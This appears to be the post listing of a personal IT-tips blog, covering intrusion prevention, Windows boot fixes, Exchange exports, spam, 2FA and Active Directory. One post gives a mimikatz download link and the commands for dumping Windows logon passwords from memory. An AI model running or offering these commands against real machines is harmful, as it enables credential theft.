Posts

What is an intrusion prevention system?

Image
I ntrusion Prevention and Detection System Basics An Intrusion Prevention System (IPS) is a network security/threat prevention technology that examines network traffic flows to detect and prevent vulnerability exploits. Vulnerability exploits usually come in the form of malicious inputs to a target application or service that attackers use to interrupt and gain control of an application or machine. Following a successful exploit, the attacker can disable the target application (resulting in a denial-of-service state), or can potentially access to all the rights and permissions available to the compromised application. Prevention The IPS often sits directly behind the firewall and it provides a complementary layer of analysis that negatively selects for dangerous content. Unlike its predecessor the Intrusion Detection System (IDS)—which is a passive system that scans traffic and reports back on threats—the IPS is placed inline (in the direct communication path betwee

Fix slow boot times in Windows 10

Image
Fix slow boot times in Windows 10 Similar process on Windows 8 before, Windows 10 uses a hybrid boot to enable fast boot times. When you shut the system down, apps and app processes are terminated, but the Windows kernel itself is hibernated to allow for a faster restart. In theory, it's great, but it seems to still be very slow for some Windows 10 users. Disable it by searching for Power Options in the Start Menu and running the matching Control Panel applet, then in the left-hand pane click Choose what the power buttons do. Click Change settings that are currently unavailable, scroll down and un-tick Turn on fast start-up, then click save changes. This should prevent very slow starts on affected PCs. Some users report that if they subsequently ; When using a dual-booting between Windows 10 and Windows 7, switching fast start-up off will also fix the problem where Windows 7 checks the disks each time you boot it: With fast start-up enabled, the earl

How to Export Mailboxes with Exchange

Image
How to Export Mailboxes with Exchange Server 2010 SP1 Exchange Server 2010 Service Pack 1 introduced a new method for exporting mailboxes called Mailbox Export Requests. This new method replaces the previous Export-Mailbox command. Before we look at how to create a new mailbox export request in Exchange 2010 SP1 there are a few things that you should understand. Firstly, no accounts are granted the rights to export mailboxes by default. You need to Explicitly grant these rights, even to accounts that are organization administrators. Secondly, the mailbox export request is processed by the Client Access server role. Because multiple Client Access servers can exist in a site the request could be processed by any one of them. To ensure that the path to the export PST 􀃖 le is valid for any Client Access server it has to be a UNC path to network share, not a local path. GRANTING USER RIGHTS FOR MAILBOX EXPORTS IN EXCHANGE 2010 SP1 The Fi rst step is to gr

How to get windows logged on users passwords

Image
How to get windows logged on users passwords Download the mimikatz tool from below link https://github.com/gentilkiwi/mimikatz/releases/download/2.1.0-20160922/mimikatz_trunk.zip Extract the zip and select the appropriate windows architecture  Run the below two commands Cmd1 privilege::debug Cmd2  sekurlsa::logonPasswords full You see the password for your computer account Note:-This is for educational purpose only. try at your own risk.

Difference between Online and offline UPS

Image

What is Spam?

Image
What is Spam? Spam is a Irrelevant or unsolicited messages sent over the Internet, typically to large numbers of users, for the purposes of advertising, phishing, spreading Virus, etc. How Spam Mail Look Like? How to Avoid 1.     Always  check the sender  and recipient information of suspicious messages. Spam will typically be sent from falsified email addresses to conceal the real sender, with a number of recipients in the BCC (blind carbon copy) field of the message to hide the large number of recipients. 2.     Don’t open any suspected attachment from the unknown users. Attachment can contain virus which will make your Data (Excel, word, PPT) Corrupted or can be erased. 3.     Important: Never EVER click on a link in an email that you're not absolutely certain is safe. 4.     Never reply to unknown or suspected although the email will say something like,   "reply with unsubscribe in the subject line to be ta

How to Make a Console Cable

Image
How to Make a Console Cable Overview: The console port on the SonicWALL Appliance is used to access the SonicOS Command Line Interface (CLI) via the DB9 -> RJ45 cable. Procedure: The Pin assignments to make a Console cable (rollover cable) to work with sonicwall appliances is follows: RJ-45 to DB-9 Serial Cable Pin Assignments:   How to test: Launch a terminal emulation application that communicates with the serial port connected to the appliance. Use these settings: • 115,200 baud • 8 data bits • no parity • 1 stop bit • no flow control Press Enter/Return. Initial information is displayed followed by a DEVICE NAME> prompt.

Decrypter for Locky and TeslaCrypt ransomwae Virus

Image
How do I clean a TeslaCrypt infection using the ESET TeslaCrypt & locy ransomware decrypter? Your personal files became encrypted and the following information may be displayed in your computer, or in a .txt, .html or .png file ​ our ESET product detects the infection Win32/Filecoder.TeslaCrypt   How to decrypt your files using the ESETTeslaCryptDecryptor.exe tool Details Solution Download the ESETTeslaCryptDecryptor.exe tool and save the file to your Desktop.   Click Start → All Programs → Accessories , right-click Command prompt and then select Run as administrator from the context menu. Windows 8 / 8.1 / 10 users : press the Windows key + Q to search for applications, type Command prompt into the Search field, right-click Command prompt and then select Run as administrator from the context menu.   Type the command cd %userprofile%\Desktop

Google Apps for Work.

Image
Google Apps for Work. Here are three reasons to give it a try: You can get customised email and more with Gmail for work. It helps employees get things done while collaborating more quickly and efficiently. Millions of businesses, large and small, have already made the switch. Get all of these tools in the Google Apps suite for Rs. 150 /user/month. Google Apps for Work. ​ Get a Free trail

What is a common security feature that often relies on a mobile phone to verify an account when logging in?

Image
  ​ What is a common security feature that often relies on a mobile phone to verify an account when logging in? Texting Two-Factor Authentication Mobile Code QR Code Explanation Two-factor authentication (also known as 2FA or 2-Step Verification) is a technology patented in 1984 that enables confirmation of a user's claimed identity by using a combination of two different components. These components are usually a password and username as well as something that only that user would have immediately at hand, like their mobile phone. Using a username and password together with a piece of information that only the user knows makes it harder for potential intruders to gain access and steal that person's personal data or identity.        

IP Address Automation

Image
IP Address Automation Autohotkey Script  UrlDownloadToFile, https://api.ipify.org/ , %temp%\Ip.txt Fileread, Ipaddress, %temp%\Ip.txt Gui, Font, S16 CDefault, Verdana Gui, Add, Text, x12 y49 w100 h30 , Public IP Gui, Add, Edit, x122 y49 w220 h30 vIpaddress, %ipaddress% Gui, Add, Text, x352 y49 w50 h30 vTXT, UP Gui, Add, Text, x12 y89 w100 h30 , Local IP localip:=A_ipaddress1 Gui, Add, Edit, x122 y89 w220 h30 vlocalip,%localip% Gui, Show, x608 y329 h183 w432, Pro_IPCheckerV1 return GuiClose: ExitApp    IP automation links https://wtfismyip.com/text https://api.ipify.org/

Active Directory Q& A

Image
Q: ​What is global catalog and why is it important​ ?  ​ Ans: Global Catalog  Servers contain a partial replica for every object in Active Directory. A  Global Catalog Server is used to find objects in any domain in the forest. Any Domain Controller can be made into a Global Catalog  Server. Q: what does system state backup contain Ans:  The system state contains a number of items: System Registry COM + Database Certificate Services Active Directory SysVol IIS Metabase Some of these items are only included if the specified service is installed (AD, IIS, Certificates). (Details are online. TechNet:  Server 2003/2003R2 . MSDN:  Server 2003/2003R2 .TechNet forums: Server 2008 . MSDN:  Server 2008 and upwards ) If you need to restore a server, you will need this state to recover the registry, or your AD Domain, or IIS sites. You can restore system state to the same server, or another server with identical hardware. Microsoft does not support restor

Find Manufacturer from MAC address

Image
  I ts was very difficult when the IP goes Conflict and we are having only the MAC Address of the conflict system. From find finding MAC address vendor we can have an idea what system would be like For Sharp, Canon, or like Brother we can identify it's for a printer. Matrix like it's for a EPBX system, for Samsung we can think may it will be Mobile or Camera. The Standard for the MAC address is below MA-L: IEEE MAC Address Large (24-bit block size) MA-M: IEEE MAC Address Medium (28-bit block size) MA-S: IEEE MAC Address Small (36-bit block size) OUI24: Organizationally Unique Identifier (24-bit block size) OUI36: Organizationally Unique Identifier (36-bit block size) IAB: Individual Address Blocks (36-bit block size) CID: Company ID Blocks (24-bit block size) EUI48: Extended Unique Identifier (48-bit block size) Helpful link to find out the manufacturer vendor from the MAC address Macvendors.c